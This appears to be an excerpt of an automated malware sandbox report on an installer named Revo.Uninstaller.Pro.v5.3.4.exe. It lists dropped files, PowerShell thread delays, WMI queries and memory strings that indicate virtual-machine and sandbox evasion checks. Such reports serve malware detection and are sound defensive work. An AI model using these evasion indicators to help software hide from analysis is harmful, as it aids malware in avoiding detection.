      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: RO DAVID FISCHER AG - A COMPANY OF THE APICA GROUP5.2D540419E-F4B7-47F9-B045-3539873E2AB75.1APICA PROXYSNIFFERAPICA PROXYSNIFFER"C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER.EXE"5.2
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: APICA PROXYSNIFFERAPICA PROXYSNIFFER"C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER.EXE"5.2
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: APICA PROXYSNIFFERAPICA PROXYSNIFFER"C:\USERS\VMS\PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER.EXE"5.2
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: RO DAVID FISCHER AG - A COMPANY OF THE APICA GROUP5.218F02B1E-9ABE-4B3F-B347-A65E945826B76.1APICA PROXYSNIFFERAPICA PROXYSNIFFER"C:\USERS\VMS\PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER.EXE"5.2
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Window / User API: threadDelayed 1911
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8193
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1475
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8109
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1558
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6766
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1785
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sys
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\System.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Opera_115.0.5322.77_Autoupdate_x64[1].exe
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654101308068.dll
      Source: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654087472252.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sys
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412091154091\opera_package
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyB8DA.tmp\System.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654075368040.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sys
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\nsDialogs.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe
      Source: C:\Windows\System32\rundll32.exe | Dropped PE file which has not been started: C:\Windows\System32\drivers\SETB88F.tmp
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\nsExec.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.del (copy)
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\INetC.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyB8DA.tmp\INetC.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654079011640.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\LangDLL.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exe
      Source: C:\Windows\System32\rundll32.exe | Dropped PE file which has not been started: C:\Windows\system32\DRIVERS\revoflt.sys (copy)
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654106048056.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe TID: 8188 | Thread sleep time: -95550s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6392 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1712 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7832 | Thread sleep count: 6766 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6232 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7832 | Thread sleep count: 1785 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7792 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Last function: Thread delayed
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File Volume queried: C:\Program Files FullSizeInformation
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File Volume queried: C:\ FullSizeInformation
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | File Volume queried: C:\ FullSizeInformation
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | File Volume queried: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA FullSizeInformation
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Code function: 0_2_00402930 FindFirstFileW, 0_2_00402930
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Code function: 0_2_004069FF FindFirstFileW,FindClose, 0_2_004069FF
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Code function: 0_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405DAE
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00FDA2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 16_2_00FDA2DF
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00FEAFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 16_2_00FEAFB9
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Code function: 26_2_004069FF FindFirstFileW,FindClose, 26_2_004069FF
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Code function: 26_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 26_2_00405DAE
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Code function: 26_2_00402930 FindFirstFileW, 26_2_00402930
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00FED353 VirtualQuery,GetSystemInfo, 16_2_00FED353
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl32.DllA\OpenSSL32.DllA\
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl32.DllA\
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.13B44170A-1377-48FC-B6B3-368C307523586.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Horizon View ClientVMware, Inc.5.44242424C-D130-4AD7-BDF1-DE7171B2AB906.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Workstation PlayerVMware, Inc.16.0B2A67D4A-5BEC-EA52-874C-74EC4CB5270D6.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: QEMUFabrice Bellard5.1BD1937E6-8202-C2D6-D8F5-5D703D8F3B4C10.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.1542DE07B-58FA-448D-A03B-839409DD9E3C6.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Horizon View ClientVMware, Inc.5.407598576-C6E6-4823-A54E-216AF2B0297110.0{B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{CDFB31CB-DFC3-4FE7-938E-9A0DD77D7555}5.4
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Horizon View ClientVMware, Inc.5.4C6B0BB91-7A95-43B3-A555-39E4A98858F76.1{B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{CDFB31CB-DFC3-4FE7-938E-9A0DD77D7555}5.4
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: {B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{B62BB102-57D8-420A-9403-494D81F09EA6}5.4
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: {5E16122B-D844-47B7-BB31-DA054680E671}VMware PlayerMsiExec.exe /X{5E16122B-D844-47B7-BB31-DA054680E671}16.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: {C4E01CDC-0063-493C-B383-9C4FCF7A89F7}PerfectDisk Hyper-V GuestMsiExec.exe /I{C4E01CDC-0063-493C-B383-9C4FCF7A89F7}14.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B260000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B260000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B282000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B282000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159782360.000000000B282000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159782360.000000000B261000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: QEMUFabrice Bellard5.1B62B86D5-1F75-E130-728D-C2389C19C4216.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: QEMUFabrice Bellard2.19018035B-C5DC-474D-A9AC-1562823A192E10.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.14136B17C-A935-4084-A910-D66968F3BAB86.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: {17C3235A-A4B9-44ED-8794-54D8408F9733}VMware Fusion PC Migration AgentMsiExec.exe /I{17C3235A-A4B9-44ED-8794-54D8408F9733}5.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.15499B796-E171-4F3F-8A83-4894659CCC4810.0VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"5.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Horizon View ClientVMware, Inc.5.45B1FE2E8-3EAA-4084-AB49-86C371FD57F010.0
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmp | Binary or memory string: Error in RunsOnVirtualMachineU
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: QEMUFabrice Bellard2.19018035B-C5DC-474D-A9AC-1562823A192E10.0QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"2.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: {B0E6FB2F-AAD0-4C2C-89E2-FF8F93F7F653}VMware PlayerMsiExec.exe /X{B0E6FB2F-AAD0-4C2C-89E2-FF8F93F7F653}14.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: QEMUFabrice Bellard5.16CEB785C-9851-E072-BDA1-6F0F1796D2B86.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: QEMUFabrice Bellard2.1191E7D4A-4EB2-437E-9800-03CB58C0B8266.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PerfectDisk Hyper-V GuestRaxco Software, Inc.14.0409D79D3-E958-4939-BF50-A44B8362DCF110.0{C4E01CDC-0063-493C-B383-9C4FCF7A89F7}PerfectDisk Hyper-V GuestMsiExec.exe /I{C4E01CDC-0063-493C-B383-9C4FCF7A89F7}14.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1B4ED644D-9E22-4DCF-8EC5-0842C70E179F10.0
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: Call: RunsOnVirtualMachine
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.1BD1937E6-8202-C2D6-D8F5-5D703D8F3B4C10.0QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"5.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PerfectDisk Hyper-V GuestRaxco Software, Inc.14.0832A0C4E-0513-4EB8-BC57-FC06C3E4A3AD6.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.227542D48-5663-4A91-9043-4324A8A21FFD6.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.4A042C43B-8035-4A6E-A59D-59DB311495826.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.113C921E7-8314-4819-948E-2F9F8B0951BB10.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.1A9D8CF1F-2C8B-2834-3EA5-D27E27E27CE56.1QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"5.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1FC41C749-2D65-477F-A07B-C33FE45FCB016.3
